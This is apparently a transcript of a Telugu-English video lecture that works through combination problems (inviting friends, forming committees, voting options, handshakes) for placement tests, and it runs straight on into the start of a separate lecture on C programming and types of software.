can invite any 4 people, or he can invite all the 5 people. He can invite all the 5 people. So it is going to be 531, 532, 5C3, 5C4, 535. Now let's see how this works. So what is 5C1? So 5C1 may try just it's going to be 5, but I just want to understand how it works. Let's see, this is 5 factorial by 5 minus 1 factorial into 1 factorial. It is going to be, so if you understand, 5 by, correct, it is 5 minus 1, it is 4 factorial. 5 into 4 5 factorial అని రాసుకోవచ్చు. డిసెండింగ్ ఆర్డర్ మల్టిప్లికేషన్ కాబట్టి నేను 5 into 4 factorial రాస్తున్నాను by 4 factorial, ఎందుకంటే 5 minus 1 factorial. So 4 factorial gets cancelled. Here it is 5. Now see, or he can invite 5C 2 ways. అవునా,
in the sense which is 5 factorial by 5 minus 2 factorial into how much it is? 5 minus 2 factorial into 2 factorial, which means 5 factorial by 3 factorial into 2 factorial, which means then ela note cheyochu meeru 5 factorial ante 5 into 4 into 3 factorial raicha and 3 factorial into 2 factorial. Now 3 factorial gets cancelled, 2 factorial anna 2 anna okate, so 2 ones rows and 5 twos are how much it is? 10. Alright, 5, 10. Now let's see, here it is 5C3, which means 5 factorial by, so 5 minus 3 factorial into 3 factorial, which means 5 factorial by, understand, which is 2 factorial into 3 factorial. Now it is going to be 5 factorial by 2 factorial into 3 factorial, we know that it is 10. So here it is 10, here it is 10 ways, here it is 5 ways, correct? Now let's understand 5C4. 5C4 and it is so simple, 5 factorial by 5 factorial, 5 minus 4 factorial into 4 factorial. Avuna? So which means 5 by, it's like 4 factorial, correct? So 4 factorial, which means 5 into 4 factorial by 4 factorial, which means 4 factorial gets cancelled and 5 is the remaining. This is 5 ways. So initial ga okarne piliste 5 different ways lo pilavachu. Let's say ఇద్దరిని పిలిస్తే 10 different ways లో పిలవచ్చు, ముగ్గురిని పిలిస్తే 10 different ways లో పిలవచ్చు, and then if he is going to invite 4 people, once again 5 different ways లో, and finally if he is going to invite all the 5, it's like 5 factorial by 5 minus 5 factorial into 5 factorial, and this is so simple, 0 factorial is 1, so 5 factorial by 5 factorial, which means it is one way. Andarni piliste there is only one way, ante kada. So unnade 5 mandi and 5 mandini piliste it's going to be one way. So it is going to be 5, 10, 15 and plus 10, 25, 25 plus 5 it is 30 and 1, 31 ways. 31 ways. Correct. So 31 different ways లో తను ఒకరిని కానీ లేదు మోర్ దెన్ వన్ అంటే మాక్సిమం ఎన్ని ఉన్నాయో అన్ని మీరు సెలెక్ట్ చేసుకోవాలి. సో ఇక్కడ నేను ఎలా సాల్వ్ చేశాను మీరు చూసినట్లయితే ఒకరినే పిలిస్తే ఎన్ని డిఫరెంట్ వేస్లో పిలవచ్చు, ఇట్ ఇస్ గోయింగ్ టు బి 5C1 5 వేస్, ఇద్దరిని మాత్రమే పిలిస్తే 5C2 వేస్, అండ్ ముగ్గురిని మాత్రమే పిలిస్తే 5C3 వేస్, నలుగురిని మాత్రమే పిలిస్తే 5C4 వేస్, 5 మంది పిలిస్తే ఇట్స్ లైక్ 535 which is going to be 1. So all together 5, 10, 10, 5 and then 1 which is nothing but 31 ways లో he can invite 5 of his friends, and remember only invite one or more than friends. Now so in order to solve this in an easier way, do we have a shortcut for this? Of course we can. Now try to understand, see ఈ స్టెప్ని గుర్తుపెట్టుకొని నా లెట్స్ సే ఇది ఈజీగా సాల్వ్ చేయాలంటే ఎలా ఈ క్యాలిక్యులేషన్స్ అన్ని లేకుండా అంటే, సో ఇనిషియలీ కన్సిడర్ దిస్ 5 ఆర్ ఇస్ ఆబ్వియస్లీ ప్లస్ ఇన్ పర్ముటేషన్ కాంబినేషన్, అవునా? సో ఇట్ ఈస్ అ ప్లస్ హియర్, సో ప్లస్ అంతే కదా, ఒకరిని ఆర్ ఇద్దరిని ఆర్ ముగ్గురిని ఆర్ నలుగురిని లేదా 5 మంది ఆర్, సో ఇట్స్ ఆల్ గోయింగ్ టు బి ప్లస్ 5C1 plus 5C2 plus 5C3 plus 5C4 plus 5C5. Now this is in terms of if you observe this, see let's say NC1 ఇది ఏ ఫామ్ లో ఉంది అని మీరు చూసినట్లయితే NC1 NC2 NC3 goes on NCN అనే ఫార్మాట్ లో ఉంటే we can simply make it as 2 power n minus 1. 2 power n minus 1. This is going to be shortcut. Now if you see 5C1, 5C2, 5C3, 5C4, 5C5, this is almost similar. Not almost, it is similar. Correct. In such case, so 2 power n. N is how much? N is 5. Correct. So n is 5. So 2 power 5 minus 1. 2 power 5 is how much? 32. So 32 minus 1 is how much? 31 ways. 31 ways. మీరు ఇలా సాల్వ్ చేసిన ఓకే. సో ఇన్స్టెడ్ ఆఫ్ ఒక్కొక్కటి సాల్వ్ చేయడానికి ఈ షార్ట్ కట్ మీరు గుర్తుపెట్టుకుని NC1 plus NC2 plus NC3 goes on NCN is equal to 2 power n minus 1 is going to be the shortcut formula, whereas this is going to be your answer. I hope you understand this. Let's go for the next question. If you see this, in how many ways can a committee of 6 members be formed from 7 men and 6 ladies consisting of 4 men and 2 ladies? So now you're going to form a committee. Guys, try to understand, you're going to form a committee. Alright, so in such committee, okay, here you have to understand one thing.
So ఇందాక నేను చెప్పినప్పుడు స్టార్టింగ్లో ఇనిషియలీ స్టార్టెడ్ విత్ లెట్స్ సే వీ హ్యావ్ బిఫోర్ వీ సాల్వ్ దిస్ క్వశ్చన్ యూ నీడ్ టు అండర్స్టాండ్ దిస్. Okay, remember if I say let's take only one fellow, let's take only 2 people, forget about C. So initially I started with C as well, so it once again it makes our calculation bit more complex. Let's take A and B. A and B మాత్రమే ఉన్నారు అనుకుంటే, so as I told you our permutations are always greater than combinations. Correct? So ఇలాంటి క్వశ్చన్ సాల్వ్ చేసేటప్పుడు దీంట్లో మీకు క్లారిటీ ఉండాలి. సో A and B, let's say capital A and B లో నేను ఎక్స్ప్లెయిన్ చేస్తాను. ఓకే, A and B ఇద్దరు ఉన్నారు, 2 ఎలిమెంట్స్. ఓకే, ఈ 2 ఎలిమెంట్స్ అయితే if I'm going to do the arrangement then it is going to be AB BA. అవునా? If I'm going to choose, this is permutation which means arrangement. If I'm going to take the combination then it is going to be selection just only AB అంతే. సో నేను ఒకసారి వీళ్ళిద్దరిని సెలెక్ట్ చేసుకుంటాను. సో it is going to be 2 times and it is going to be 1 time. Now we are going to arrange here, that's why order A, B and B అని వచ్చింది. Here we are not going to arrange them, we are just going to choose them. Here ఇలాంటి క్వశ్చన్స్ కూడా మీరు చూసినట్లయితే ఈజీగా ఐడెంటిఫై చేయడానికి, whereas క్వశ్చన్లో అరేంజ్ చేయబోతున్నామా జస్ట్ చూస్ చేయబోతున్నామా అనేది యూ హ్యావ్ టు అండర్స్టాండ్. ఆల్రైట్, నౌ ఇఫ్ యూ సీ ద క్వశ్చన్ హియర్, ఇన్ హౌ మెనీ వేస్ అ కమిటీ ఆఫ్ 6 members కెన్ బి ఫార్మ్డ్ ఇన్ ద సెన్స్ అరేంజ్మెంట్ అని కాదు. ట్రై టు అండర్స్టాండ్, మీకు పర్ముటేషన్లో కాంబినేషన్ రెండిట్లోనూ ఫార్మ్డ్ అనే వస్తుంది. ఇఫ్ మీరు పర్ముటేషన్లో ఒక క్వశ్చన్ మీరు చూసినట్లయితే ఇన్ హౌ మెనీ 3-digit numbers can be formed using the digits అని వస్తుంది. ఫార్మ్డ్ అనేది కామన్ వర్డ్, బట్ బియాండ్ దట్ క్వశ్చన్ కొంచెం మీరు ఆలోచించినట్లయితే ఇట్ ఈస్ సో సింపుల్. కమిటీలో కొంతమంది టోటల్గా ఉంటే వాళ్ళని మనం ఒక కమిటీ ఫామ్ చేస్తున్నాం, అంతేగాని వాళ్ళని మనం అరేంజ్ చేయట్లేదు. ఆల్రైట్, జస్ట్ ఫామ్ చేసి వదిలేస్తున్నాం. ఫర్ ఎగ్జాంపుల్, మీ ముందు ఒక 10 మెంబర్స్ని కూర్చోబెట్టి ఇందులో నుండి మీరు ఒక కమిటీ ఫామ్ చేయాలి. ఆ కమిటీలో 2 members ఉంటే చాలా ఉంటే మీరు ర్యాండమ్గా ఏదో ఒక 2 members మీరు తీసుకుంటారు, అంతేనా? ఆ 2 members మళ్ళీ మీరు ఎలా కావాలి, రైట్ అండ్ లెఫ్ట్ అని మీరు అరేంజ్ చేయట్లేదు. సో అదే డిఫరెన్స్. వెరస్ ఏబి నేను తీసుకున్నప్పుడు ఐఎమ్ గోయింగ్ టు అరేంజ్మెంట్ అంటే ఏబి బిఏ 2 కన్సిడర్ చేసుకుంటాను. వెరస్ కాంబినేషన్ తీసుకునేటప్పుడు ఓన్లీ ఏబి. లెట్స్ సే ఇఫ్ ఇట్ ఇస్ సి, ఆల్రైట్, ఇఫ్ ఇట్ ఇస్ సి అంటే ఇప్పుడు 3 ఉన్నారు. ఇప్పుడు 3లో నేను 3ని తీసుకుంటాను అనేటప్పుడు ఎలా ఉంటుంది అనేది కూడా మీరు తెలుసుకోవాలి. సో ఇది మనం చూసినట్లయితే, సో ఐఎమ్ గోయింగ్ టు అరేంజ్ దిస్ 3 people. ఓకే, సో ఐఎమ్ గోయింగ్ టు అరేంజ్ దిస్ 3 people అంటే అప్పుడు ఏమవుతుంది? ఫర్ ఎగ్జాంపుల్, సో ఇట్స్ గోయింగ్ టు బి ఏ బిసి, ఇదొక అరేంజ్మెంట్, అండ్ దెన్ ఇట్ ఈస్ ఏ సిబి బిసిఏ బిఏసి అండ్ సిఏబి అండ్ CBA. Correct. Now these many ways వీళ్ళని మనం అరేంజ్ చేయొచ్చు. లెట్స్ సే ఫర్ ఎగ్జాంపుల్ 3 elements ఉన్నాయి, A B C అంటే ఇట్స్ గోయింగ్ టు బి ACB BCA BAC CBA and CAB. Correct. Now when it comes to combination, I'm going to select this 3 people అంటే it's going to be only one way, A B C, that's it. You're not going to do multiple things here. It's going to be only one way you can select all the 3 people. See, మీకు 3 ఉన్నారు అండ్ 3ని మీరు కన్సిడర్ చేయబోతున్నారు. ఆల్రైట్, హియర్ మీరు కన్ఫ్యూజ్ అవ్వడానికి ఇక్కడేం లేదు. అండర్స్టాండ్ దిస్. నా సో కాంబినేషన్స్లో పర్ముటేషన్స్లో ఇంకొకటి ఎక్కడ మీకు ప్రాబ్లమ్ వస్తుంది. లెట్స్ సే ఇఫ్ వీ హ్యావ్ 3 people అండ్ వీఆర్ గోయింగ్ టు సెలెక్ట్ ఓన్లీ 2 people, అరేంజ్ ఆర్ సెలెక్ట్, అప్పుడు మనం ఏం చేస్తామని చెక్ చేయాలి. నా లెట్స్ సే ఈ పర్టికులర్ కేస్ మీరు చూసినట్లయితే, సో వీ హ్యావ్ 3 people. సో ఈ 3 peopleలో, so in how many ways I can arrange 2 different people అంటే try to understand. See, first thing, నేను AB లేదు BA, correct, AB లేదు BA, and let's say నేను CB అని తీసుకుంటే it's going to be CB or BC, లేదు నేను AC తీసుకుంటే AC or CA అని వస్తుంది. Understand this? Here it's going to be AB లేదు BC లేదు CA, that's it. It's so simple. Here we get multiple arrangements and all, but here we got only 3. But I don't bother how A and B are going to sit or arranged. So it's like I'm going to choose AB, ledante BC, ledante CA. This is just a selection. This is arrangement. Fantastic. Now if you see this question, now you will understand. Just have a look at the screen. Okay. In how many ways a committee of 6 members? Fantastic. So it's going to be 6 members can be formed out of how many men? 7 men. And how many ladies? 6 ladies. 6 members I'm going to form, consisting of 4
men and 2 ladies. Fantastic. 4 men and 2 ladies. Alright, this is the concept. Observe this. So, we have 7 men, 7 male and 6 females, 7 men or 6 ladies, however the way you want. And out of this, so ఎంతమంది ఉన్నారు మీరు చూసినట్లయితే we have totally 13 people, correct? 7 plus 6 it is 13. ఆ 13 లో 7 male and 6 female. ఈ particular 7 male and 6 female లో you people are going to form a committee which has how many members? 6 members. And a 6 members లో now we have a condition. Last time మీరు చేసిన క్వశ్చన్ మనం సాల్వ్ చేసిన క్వశ్చన్ ఎలా ఉండే అంటే 7 member, I mean, so some total count here and here, and they asked us to form a committee which has this many members. అంటే for example 7 members 6 ladies ఉన్నారు, దీంట్లో నేను 6 members ఉన్న ఒక కమిటీని ఫామ్ చేయాలంటే I'll be saying 13C6. So 7 male 6 female, which means totally 13 members. ఈ 13 members లో I'm going to form a committee which has 6 members. 13C6 అనే ఆన్సర్ నేను చెప్పేసి వెళ్ళిపోతాను. But try to understand, here we have a condition. What is that condition? మీరు ఫామ్ చేసే 6 members లో అంటే 6 member కమిటీలో 4 members ఖచ్చితంగా మేల్ ఉండాలి and 2 members ఎవరు ఉండాలి? ఖచ్చితంగా లేడీస్ ఉండాలి. Alright, so we have a condition. This we need to understand. Now you cannot use 13C6 bluntly, I mean directly. So we have to do some manipulation. So what is the kind of manipulation? We are going to form a 6-member team, correct? Now let's see the 6 నేను ఎలా స్ప్లిట్ చేసుకుంటాను అనేది మీరు ఒకసారి చెక్ చేయండి. Now a 6-member team, 6 members committee, correct? The 6 members ని ఎలా చేసుకుంటాను. So how many people have to be there? ఆ టీంలో ఎలా ఈ 6 members ఎలా ఉండాలంటే డెఫినెట్గా 4 men ఉండాలి, కరెక్టా? సో 4 men. సో ఈ 4 men అనేది టోటల్ కౌంట్ ఎంతమంది మేల్స్ ఉన్నారు అంటే 7 males ఉన్నారు. సో ఈ 7 males లో నేను 4 males-ని సెలెక్ట్ చేసుకుంటున్నాను. ట్రై టు అండర్స్టాండ్, ఈ 7 males నేను 4 males-ని తీసుకుంటున్నాను ప్లస్ alright now, and so it's obviously into, and then what is a female? So we have totally 7 men and how many females are there? Ladies are here. It is going to be 6 females, correct? 6 females. So ఈ 7 members లో 4 members ని తీసుకుంటున్నాను and then ఈ 6 members లో 2 members ని తీసుకుంటున్నాను. That's it. This is going to be the answer. 7C4 into 6C2. I repeat this. 7 men, you have 7 men and 6 females with you, whereas you have to form a 6-member committee, and ఈ 6 members లో try to understand, ఈ 6 members లో definite గా 4 males ఉండాలి, 2 females ఉండాలి. సో 4 males ఉండాలి కాబట్టి ఈ males total ఎంతమంది ఉన్నారు? 7 members ఉన్నారు. సో 7C4 into, and it is going to be and. Remember, so and in permutation combination is always, you have to use a multiplication symbol, and wherever you get or, it's obviously addition symbol. So you have to follow the same rule here. Now in such case, so 7C4 and finally it is going to be 2 females ఉండాలి ఈ 6 members లో. ఆ 2 females ఎవరు అంటే 6 females లో ఉన్న ఎవరన్నా ఇద్దరు. సో it's going to be 6C2. Now if you solve, it's going to be 7 factorial by 7 minus 4 factorial into 4 factorial. అవునా? Into, it is going to be 6 factorial by 6 minus 2 factorial into 2 factorial. Hence it is 7 factorial by 3 factorial into 4 factorial into 6 factorial by, so it is going to be 4 factorial into 2 factorial. Now if you simplify, this can be written as 7 into ఈ పర్టికులర్ పార్ట్ మీరు చూసినట్లయితే 7 into 6 into 5 into 4 factorial రాసుకోవచ్చు. 7 descending order multiplication. So 7 into 6 into 5 into 4 by this can be written as 3 factorial into 4 factorial. Now I'm going to cancel this 4 factorial and we are left with 7 into 6 into 5 by 3 factorial raskochu 3 into 2 into 1. And guys, we know that this is 3 2s 6 and 7 5s 35. So this is nothing but 35 into. Now let's see what are the, let's solve this, which is nothing but 6 can be written as 6 into 5 into, and what is this?
4 factorial by 4 factorial into 2 factorial. Now 4 factorial gets cancelled, and 2 factorial is nothing but 2 1s and 2 3s, which is 5. We are left with 3 into 5, which is 15. Fantastic. Now this is 15. So the final answer is going to be 35 into 15. So 5 5s 25. So 5 5s 25, 5 3s 15, 17, and this is obviously 35, and so 5, and it's going to be 12, and it is 5. So 525 base. 525 base. That's it. So if you get the answer this way, it is so simple, which is 7C4 into 6C2. Ila answers undali and chepi. In fact, I always wish, but it depends. Ila answers ila short form lo ravachu, but 90% it is going to be as a number. So 7C4 into 6C2 to answers ni stop cheyadandi. Please try to multiply and try to get the answer. Start practicing it. Alright, so you cannot expect that I'm going to stop here and I'll get the same thing as an option in my examination. No, never. Alright, let's see the next question. Okay, in a committee, in how many ways can a committee of 4 men and 3 women can be appointed from 6 men and 8 women? So simple. Now, see this question. I think we have already done this question. Let's this type of question we have already done. Let's go to the next question. This is very important. And now, see this question. At an election, how many candidates? It's going to be 5 people. Correct? Yes. So at an election, there are 5 candidates. 3 members are to be elected, and a voter is entitled to vote for any member to be elected. How many ways a voter can vote? Okay. And there is a hint for this question as well. Voter has an option to vote for at least 1 candidate or at most 3 candidates. Fantastic. Now, in how many ways can a voter can vote? Alright, so this is something, it's like what I can say. It's like somewhat tricky question which you have to understand. So, how many people are there? If you ask me, totally 5 people. Alright, let's say I'm going to name them as A, B, C, D, E. There are 5 people. These are the names. Okay, A, B, C, D, E. And how many people? 3 members are to be elected. So, out of this A, B, C, D, E, we are going to elect only 3 people. In such case, in how many ways a voter can vote? This is something tricky. This is not as easy as the previous question what I've seen. Now, how to do this? This is very simple. Simple in the sense, if you understand I'm talking about. A, B, C, D, E. దీని తెలుగులో నేను చెప్తే 5 మంది ఉన్నారు, టోటల్గా 5 మెంబర్స్ ఉన్నారు. ఈ 5 మెంబర్స్లో నేను ముగ్గురిని మాత్రమే సెలెక్ట్ చేసుకోగలుగుతాను. ఈ ముగ్గురిని మాత్రం నేను ఓట్ చేయగలుగుతాను. ఇన్ఫాక్ట్ సెలెక్ట్ చూసింగ్ ఇన్ ద సెన్స్ హియర్ ఇట్స్ గోయింగ్ టు బి ఓటింగ్. సో ఇది ముగ్గురికి నేను చూస్ చేసుకోగలుగుతాను. నా ఇన్ హౌ మెనీ వేస్ వీ కెన్ డూ ఇట్, ఓటర్ కెన్ ఓట్ ఇట్ అంటున్నారు. బట్ ట్రై టు అండర్స్టాండ్ ఓటర్ ఎంతమందిని చూస్ చేసుకోవచ్చు. ఫర్ ఎగ్జాంపుల్ నేను ఓటింగ్కి వెళ్తే నేను ముగ్గురిని చూస్ చేసుకోవచ్చా, ఒకరిని చూస్ చేసుకోవచ్చా, ఇద్దరిని చూస్ చేసుకోవచ్చా అంటే ఇట్ ఇస్ సో సింపుల్. ఓటర్ మినిమం ఒకరిని చూస్ చేసుకోవచ్చు, మ్యాక్సిమం ముగ్గురిని చూస్ చేసుకోవచ్చు. ఆల్రైట్, మ్యాక్సిమం. సో ఇఫ్ యూ కెన్ సీ, ఇఫ్ యూ అబ్జర్వ్ ద స్క్రీన్, ఓటర్ హ్యాస్ ద ఆప్షన్ టు ఓట్ ఫర్ అట్లీస్ట్ 1, correct? To vote for at least 1 and at most 3 candidates. So you have 3 different conditions here. ఈ 3 different conditions ని మీరు కన్సిడర్ చేసుకుంటే మాత్రమే ఇది మీకు వస్తుంది. లెట్స్ సే ఫర్ ఎగ్జాంపుల్ ఫస్ట్ కండిషన్ ఏంటి అంటే, నేనే కాసేపు ఓటర్ అని తీసుకుంటే, సో నేను ఆ పోలింగ్ బూత్కి వెళ్ళి, సో 5 candidates ఉన్నారు, కరెక్ట్? నా లెట్స్ సే ఇఫ్ ఐమ్ గోయింగ్ టు ఓట్ అని తీసుకుంటే, సో నా ఆప్షన్స్ ఏంటి? నేను ముగ్గురిని సెలెక్ట్ చేసుకోవచ్చు కదా, ముగ్గురినే ఖచ్చితంగా సెలెక్ట్ చేసుకోవాలని లేదు. నేను ఒకరిని సెలెక్ట్ చేసుకుంటే పాసిబిలిటీస్ ఏంటి? లెట్స్ సే ఐమ్ గోయింగ్ టు చూస్ ఓన్లీ 1 person. అంటే ఈ 5 మెంబర్స్లో నేను ఒక్కరికి మాత్రమే ఓట్ చేశాను అంటే, విచ్ మీన్స్ ఇట్స్ గోయింగ్ టు బి 5C1. సో వీ ఆల్ నో దాట్ 5 మెంబర్స్లో నేను ఒకరిని మాత్రమే సెలెక్ట్ చేసుకుంటే ఇట్ ఇస్ 5C1. అండ్ 5C1 వీ ఆల్రెడీ నో దట్ ఇట్ ఇస్ 5 different ways. కరెక్ట్? 5 different waysలో నేను చూస్ చేసుకోవచ్చు. ఇన్ ద సెన్స్ దిస్ ఇస్ ఓన్లీ 1 person. నా లెట్స్ సే నేను ఇద్దరికి ఓట్ చేసిన అంటే, నేను ఇద్దరిని చూస్ చేసుకుంటున్నానంటే ఐ కెన్ ఓట్, నేను ఇద్దరికి ఓట్ చేసిన, ఈ 5 మెంబర్స్లో నేను ఇద్దరిని సెలెక్ట్ చేసి వాళ్ళకి ఓటింగ్ వేస్తున్నాను అంటే 5C2. సో విచ్ ఇస్ నథింగ్ బట్ మనం ఆల్రెడీ చూసాం. సో ఇట్స్ లైక్ 5 factorial by 5 minus 2 factorial into 2 factorial, which is nothing but 10 different ways.
10 different ways and try to understand ఈ కండిషన్ ఎప్పుడు అంటే నేను ఇద్దరికి ఓటింగ్ చేసినప్పుడు నా మ్యాక్సిమం నేను ఇంకా ఎంతమంది చూస్ చేసుకోవచ్చు అంటే నాకున్న ఫైనల్ ఆప్షన్ నేను ముగ్గురికి ఓటింగ్ చేయొచ్చు విచ్ ఇస్ నథింగ్ బట్ 5C3 which means 5 factorial by 5 minus 3 factorial into 2 factorial, correct, which means this is also 10 different ways ante so ఇది already మనం solve చేసాం this is also it's only 10 different ways which means I'm going to select 3 people. ఓకే సో నేను ఒకరి మాత్రమే చూస్ చేసుకుంటే నేను 5 different ways చూస్ చేసుకోవచ్చు ఎందుకంటే 5 members ఉన్నారు. నేను ఇద్దరిని చూస్ చేసుకుంటే ఐ హ్యావ్ 10 different కాంబినేషన్స్ అంటే 10 different వేస్లో నేను సెలెక్ట్ చేసుకోవచ్చు. నేను ముగ్గురికి ఓట్ చేయాలి అనుకుంటే 10 different వేస్లో చేసుకోవచ్చు. సో టోటల్గా నాకు ఎన్ని ఆప్షన్స్ వస్తుంది అంటే 5 + 10 + 10 సో ఇట్ ఈస్ గోయింగ్ టు బి 25 వేస్. 25 different వేస్లో నేను ఓట్ చేసేసి రావచ్చు. ఓటింగ్ అంటే సెలెక్ట్ చేసుకొని రావచ్చు. ఒకరినే సెలెక్ట్ చేసుకుంటే నాకు 5 వేస్ కనబడుతుంది, ఇద్దరిని సెలెక్ట్ చేసుకుంటే 10 వేస్, ముగ్గురిని సెలెక్ట్ చేసుకుంటే 10 వేస్. టోటల్గా నాకు ఛాన్సెస్ ఎన్ని ఉంటుందంటే 25 different వేస్లో నేను ఓటింగ్ చేసి రావచ్చు ఇఫ్ ఐ కన్సిడర్ మై సెల్ఫ్ యాజ్ అ ఓటర్. ఆల్రైట్, లెట్స్ సీ ద ఇంట్రెస్టింగ్ క్వశ్చన్ నా. దీస్ ఆర్ సో ఇంపార్టెంట్. ఆల్రైట్, ఇలాంటి క్వశ్చన్స్ మీరు ఎగ్జామ్స్లో ఇలాంటి క్వశ్చన్స్ మీరు ఫేస్ చేసి ఉంటారు. లెట్స్ సే సపోజ్ దెర్ ఆర్ 42 men and 16 women in a party. Try to understand. Suppose there are 42 men and 16 women in a party. Each man shakes his hand only with all the men. Alright, so each man shakes his hand only with all the men and each woman shakes her hand only with all the women. So we have to find the maximum number of handshakes that have taken place at the party. Fantastic. So ilanti questions meer chudandi, normal ga committee formation anta meeku already chusam kabatti it's going to be simple and easy, but ilanti questions solution part meer chusnatlaithe we don't have much, but when it comes to understanding the question, yes, of course it is difficult. Okay, now so totally enta mandi unnaru? It's going to be 58 people. It's 58 people, 42 members danto male and 16 people female. So males చూసినట్లయితే ఫర్ ఎగ్జాంపుల్ హ్యాండ్ షేక్స్ జరుగుతున్నాయి ఆ పార్టీలో. ఆల్రైట్, ఆ హ్యాండ్ షేక్స్ అంటే మేల్, లెట్స్ సే ఫర్ ఎగ్జాంపుల్ వన్ మేల్ పర్సన్ గోయింగ్ టు షేక్ హిస్ హ్యాండ్ ఓన్లీ విత్ అనదర్ మేల్ క్యాండిడేట్. Alright, and let's say one lady, she is going to shake her hand only with the another lady. In such case, టోటల్గా పార్టీ మొత్తంలో ఎన్ని హ్యాండ్ షేక్స్ ఉంటాయి అనేది మనం ఫైండ్ అవుట్ చేయాలి. ఓకే, ఇన్ సచ్ కేస్ see this questions and all, it is like the solution part, if you ask me, it is not that difficult. You can get the answer within 30 seconds as I discuss always, but the problem is have to hit the question, how to understand, how to analyze and how to hit the solution. That's going to be the challenge. So let's see. So 42 people and 42 men and 16 women, correct. Now so try to understand, if it's a handshake, it happens between two people. Avuna, handshake and definitely it happens between two people. A single person cannot give the handshake, so it's not possible. So it's minimum 2 people and not 3. 3 people cannot shake the hand at the same time. In such case, so if it's going to be handshake 42 people, let's understand how many handshakes are going to happen between this 42 men. So it is going to be 42C2. సో ఈ 2 అంటే ఇద్దరు, ప్రతి హ్యాండ్ షేక్లో ఇద్దరు ఉంటారు. ఇన్ సచ్ కేస్ 42C2, కరెక్ట్. నౌ ఇట్స్ గోయింగ్ టు బి excuse me, now it is going to be 42 factorial by, and it is 40 factorial into 2 factorial, which means 42 into 41 into 40 by 40 factorial by 40 factorial into 2 factorial. So 40 gets cancelled, and this is 42 into 41 by 2, which means 2 ones to 21. So 21 into 41. So which is 1, 2, 4 ones, 4 twos, 8. So 861. Alright, if you ask me how many handshakes that have taken place when in between men is going to be 861. So simple. This calculation is nothing but 42C2. Alright, 861. Let's understand how many handshakes that takes place between the women. It is going to be once again 16C2. 2 people are going to involve in one handshake. Now in such case it is 16
factorial by 16 minus 2 factorial into 2 factorial, correct? Now it is 16 factorial by it's 14 factorial into 2 factorial. Now this is 16 into 15 into 14 factorial by 14 factorial into 2 factorial. So 14 gets cancelled. 2 factorial is nothing but 2. So 2 ones 2 8. So 15 into 8 it is. So 15 8 it is 120. Okay. Try to understand. 861 handshakes are going to take place between within this 42 men, and 120 handshakes are going to take place between this 16 women, correct? Kani man total party lo enni ani adugutunnaru kabatti it's going to be 861 plus 120, so obviously it is 1 and this is 8 and this is 981 handshakes. 981 handshakes. This is how you solve the question. So total number of handshakes that take place in this party is nothing but 981 handshakes. So I hope you understand this permutation and combination, and exclusively this class, combinations class. If you have any questions, please post it in the comment section. And if you ask me, are these questions going to be enough? No, it's like one stage where I have given you all the different types of questions, so you have to take the have to practice a lot. So ilanti questions మీరు చూసినట్టయితే రిపీటెడ్ గా ఇది కూడా నేను ఒక TCS Infosys క్వశ్చన్ పేపర్ నుంచి తీసుకొని సాల్వ్ చేసిన క్వశ్చన్ మాత్రమే, ప్రీవియస్ గా అడిగిన క్వశ్చన్స్. సో ఇలాంటి క్వశ్చన్స్ మీరు ప్రాక్టీస్ చేయగా ఫస్ట్ థింగ్ రిమెంబర్, we have to understand whether that particular questions comes under principles of counting or whether it is permutation or it is combination. Majority of the students, they face the same scenario. Whenever they get into the examination, they could not identify what should I do with the question. A question చూడగానే I know, మీ students mentality ఇప్పుడు చూసినట్లయితే question చూడగానే this question belongs to permutation combination అని చెప్తున్నారు. But if I ask them how to solve this, no, they are keeping quiet. Now I request them, try to understand the differences before you solve the question. ఇదేంటి permutation అంటే ఏంటి నేను మీకు క్లియర్గా చెప్పాను. ఇట్ ఇస్ నథింగ్ బట్ ద అరేంజ్మెంట్, how many ways you're going to arrange it, and second, it is going to be selection, in how many ways you're going to select it, and principles of counting, it is not required at all. So just common sense is required. So whenever you see the question, try to segregate at which part it belongs to. అది మీరు చేసినట్లయితే and it is going to be easy. And remember, calculation solution part, it is going to be simple, but in order to understand and analyze the question, that's going to take time. So I hope you understand this class. Please comments, I'm not getting any comments or requests regarding any questions. Please do let me know if you have any doubts so that I can answer. Thank you so much. Welcome to the viewers. This is Suryanarayan Raju. Before going to start a C language program, now you have to know about some basics C language programming. Actually, C is a programming language. What is mean by program? What is mean by language? What is mean by software? The basics to be understand before going to start the C programming language. Now in the market, everywhere programming languages are there. C language, C++, Java, .NET, COBOL, Pascal. Now before going to start a C programming language, you have to know basics about software. What is mean by software? A set of programs called as software. What is mean by program? Program is nothing but set of instructions or a set of statements is called as program. Now see, now in the market two types of softwares are there: system softwares, application softwares. What is mean by system software? Which software understandable by the machine instructions, that software called as system software. What is mean by application software? Which software understandable by the user instructions, that software is called as application software. Now for the system software, operating systems.
Now in the market many operating systems are there: DOS, Windows, Unix, Linux, Mac. These are called as system softwares. What is meant by application software? Which software understandable by the user instructions? That software is called as application software. Now in the market different types of application softwares. Like in the daily life you are using different type of applications like Google, Gmail, Facebook. Desktop applications also there like Notepad, MS Word, Paintbrush Picture. Now these all softwares are developed based on programming languages. These all softwares are developed based on programming languages. C is a programming language. Generally what is meant by language? Language is nothing but it's a communication. Communication between the people is called as language. But in the programming, language is nothing but communication between user and the machine instructions. The system does not understand the user language. System followed by binary instructions. If you want to communicate the binary instructions, you require some language. That language is called as programming language. What is the definition of programming language? It is one of the language to communicate machine language and user language. Now here different type of programming languages are there like C, C++, Java, .NET, COBOL, Pascal. Totally in the market 125 plus programming languages you have. But these all languages, which is the basic programming language? C is a basic programming language. C is a basic program to be understand. Now see, before going to start C language, I have to define some definitions. You see the definitions now. What is meant by software? What is the meaning of software now? It is a collection of programs. Software is nothing but it's a collection of programs. What are the software types you have? Software types. What are the types of softwares you have? First category of software, system software. What is meant by system software? Which is software understandable by the machine instructions? The machine does not understand your language, that's why it is called as system software. Which software understandable by the machine instructions? That software is called as system software. Now you see which are the system softwares are there. Now in the market, which are the system software? Example, you have operating system. Operating system is one of the system software. Suppose if you want to install any softwares, which is the basic software to be installed? OS to be installed. If you purchase any laptop or if you purchase any desktop, which is the basic software to download first? Operating system. Operating system is a which category of software? System software. Now which are the types of operating systems in the market? MS-DOS, Microsoft Disk Operating System, MS Windows. Windows is also operating system from the Microsoft. Unix operating system. And what is one more type of operating system? Linux, Mac. Many operating systems are there in the market. DOS, Windows, Unix, Linux, Mac. But mostly number of programmers or number of users mostly used which operating system? Windows operating system. Mostly used Windows. Now the Windows operating system developed by which company? Microsoft. What is one more category of software you have? Application software.
